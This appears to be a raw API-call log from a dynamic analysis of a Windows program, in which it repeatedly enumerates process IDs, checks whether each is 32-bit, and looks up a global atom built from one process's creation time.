	[0102.537] CloseHandle (hObject=0x690) returned 1
	[0102.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0102.537] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.537] CloseHandle (hObject=0x690) returned 1
	[0102.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0102.537] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.538] CloseHandle (hObject=0x690) returned 1
	[0102.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0102.538] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.538] CloseHandle (hObject=0x690) returned 1
	[0102.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0102.538] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.538] CloseHandle (hObject=0x690) returned 1
	[0102.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0102.538] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.538] CloseHandle (hObject=0x690) returned 1
	[0102.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0102.538] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.538] CloseHandle (hObject=0x690) returned 1
	[0102.538] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0102.539] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.539] CloseHandle (hObject=0x690) returned 1
	[0102.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0102.539] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.539] CloseHandle (hObject=0x690) returned 1
	[0102.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0102.539] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.539] CloseHandle (hObject=0x690) returned 1
	[0102.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0102.539] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.539] CloseHandle (hObject=0x690) returned 1
	[0102.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0102.539] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.539] CloseHandle (hObject=0x690) returned 1
	[0102.539] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0102.539] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.540] CloseHandle (hObject=0x690) returned 1
	[0102.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0102.540] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.540] CloseHandle (hObject=0x690) returned 1
	[0102.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0102.540] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.540] CloseHandle (hObject=0x690) returned 1
	[0102.540] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0102.540] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0102.541] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0102.541] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0102.541] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0102.541] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0102.541] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0102.541] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0102.542] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0102.542] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0102.542] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0102.542] CloseHandle (hObject=0x690) returned 1
	[0102.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0102.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0102.542] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.542] CloseHandle (hObject=0x690) returned 1
	[0102.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0102.542] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.542] CloseHandle (hObject=0x690) returned 1
	[0102.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0102.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0102.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0102.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0102.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0102.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0102.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0102.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0102.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0102.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0102.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0102.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0102.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0102.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0102.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0102.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0102.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0102.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0102.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0102.685] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.685] CloseHandle (hObject=0x690) returned 1
	[0102.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0102.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0102.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0102.685] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.685] CloseHandle (hObject=0x690) returned 1
	[0102.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0102.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0102.686] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.686] CloseHandle (hObject=0x690) returned 1
	[0102.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0102.686] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.686] CloseHandle (hObject=0x690) returned 1
	[0102.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0102.686] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.686] CloseHandle (hObject=0x690) returned 1
	[0102.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0102.686] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.686] CloseHandle (hObject=0x690) returned 1
	[0102.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0102.686] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.687] CloseHandle (hObject=0x690) returned 1
	[0102.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0102.687] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.687] CloseHandle (hObject=0x690) returned 1
	[0102.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0102.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0102.687] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.687] CloseHandle (hObject=0x690) returned 1
	[0102.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
	[0102.687] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.687] CloseHandle (hObject=0x690) returned 1
	[0102.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0102.688] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.688] CloseHandle (hObject=0x690) returned 1
	[0102.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0102.688] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.688] CloseHandle (hObject=0x690) returned 1
	[0102.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0102.688] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.688] CloseHandle (hObject=0x690) returned 1
	[0102.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0102.688] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.688] CloseHandle (hObject=0x690) returned 1
	[0102.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0102.688] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.688] CloseHandle (hObject=0x690) returned 1
	[0102.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0102.689] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.689] CloseHandle (hObject=0x690) returned 1
	[0102.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0102.689] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.689] CloseHandle (hObject=0x690) returned 1
	[0102.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0102.689] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.689] CloseHandle (hObject=0x690) returned 1
	[0102.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0102.689] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.689] CloseHandle (hObject=0x690) returned 1
	[0102.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0102.690] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.690] CloseHandle (hObject=0x690) returned 1
	[0102.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0102.690] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.690] CloseHandle (hObject=0x690) returned 1
	[0102.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0102.690] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.690] CloseHandle (hObject=0x690) returned 1
	[0102.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0102.690] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.690] CloseHandle (hObject=0x690) returned 1
	[0102.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0102.690] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.690] CloseHandle (hObject=0x690) returned 1
	[0102.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0102.691] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.691] CloseHandle (hObject=0x690) returned 1
	[0102.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0102.691] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.691] CloseHandle (hObject=0x690) returned 1
	[0102.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0102.691] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.691] CloseHandle (hObject=0x690) returned 1
	[0102.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0102.691] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.691] CloseHandle (hObject=0x690) returned 1
	[0102.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0102.692] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.692] CloseHandle (hObject=0x690) returned 1
	[0102.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0102.692] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.692] CloseHandle (hObject=0x690) returned 1
	[0102.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0102.692] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.692] CloseHandle (hObject=0x690) returned 1
	[0102.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0102.693] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0102.693] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0102.693] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0102.693] wsprintfA (in: param_1=0x39937e0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0102.693] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0102.694] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0102.694] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0102.694] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0102.694] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0102.694] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0102.694] CloseHandle (hObject=0x690) returned 1
	[0102.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0102.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0102.694] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.694] CloseHandle (hObject=0x690) returned 1
	[0102.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0102.695] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.695] CloseHandle (hObject=0x690) returned 1
	[0102.747] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0102.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0102.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0102.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0102.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0102.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0102.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0102.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0102.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0102.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0102.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0102.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0102.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0102.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0102.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0102.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0102.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0102.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0102.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0102.750] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.750] CloseHandle (hObject=0x690) returned 1
	[0102.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0102.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0102.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0102.751] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.751] CloseHandle (hObject=0x690) returned 1
	[0102.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0102.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0102.751] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.751] CloseHandle (hObject=0x690) returned 1
	[0102.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0102.751] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.751] CloseHandle (hObject=0x690) returned 1
	[0102.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0102.751] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.751] CloseHandle (hObject=0x690) returned 1
	[0102.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0102.751] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.751] CloseHandle (hObject=0x690) returned 1
	[0102.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0102.752] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.752] CloseHandle (hObject=0x690) returned 1
	[0102.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0102.752] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.752] CloseHandle (hObject=0x690) returned 1
	[0102.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0102.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0102.752] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.752] CloseHandle (hObject=0x690) returned 1
	[0102.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
	[0102.752] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.752] CloseHandle (hObject=0x690) returned 1
	[0102.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0102.753] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.753] CloseHandle (hObject=0x690) returned 1
	[0102.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0102.753] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.753] CloseHandle (hObject=0x690) returned 1
	[0102.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0102.753] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.753] CloseHandle (hObject=0x690) returned 1
	[0102.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0102.753] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.753] CloseHandle (hObject=0x690) returned 1
	[0102.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0102.753] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.753] CloseHandle (hObject=0x690) returned 1
	[0102.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0102.754] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.754] CloseHandle (hObject=0x690) returned 1
	[0102.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0102.754] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.754] CloseHandle (hObject=0x690) returned 1
	[0102.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0102.754] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.754] CloseHandle (hObject=0x690) returned 1
	[0102.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0102.754] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.754] CloseHandle (hObject=0x690) returned 1
	[0102.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0102.754] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.754] CloseHandle (hObject=0x690) returned 1
	[0102.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0102.755] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.755] CloseHandle (hObject=0x690) returned 1
	[0102.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0102.755] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.755] CloseHandle (hObject=0x690) returned 1
	[0102.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0102.755] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.755] CloseHandle (hObject=0x690) returned 1
	[0102.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0102.755] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.755] CloseHandle (hObject=0x690) returned 1
	[0102.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0102.755] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.756] CloseHandle (hObject=0x690) returned 1
	[0102.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0102.756] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.756] CloseHandle (hObject=0x690) returned 1
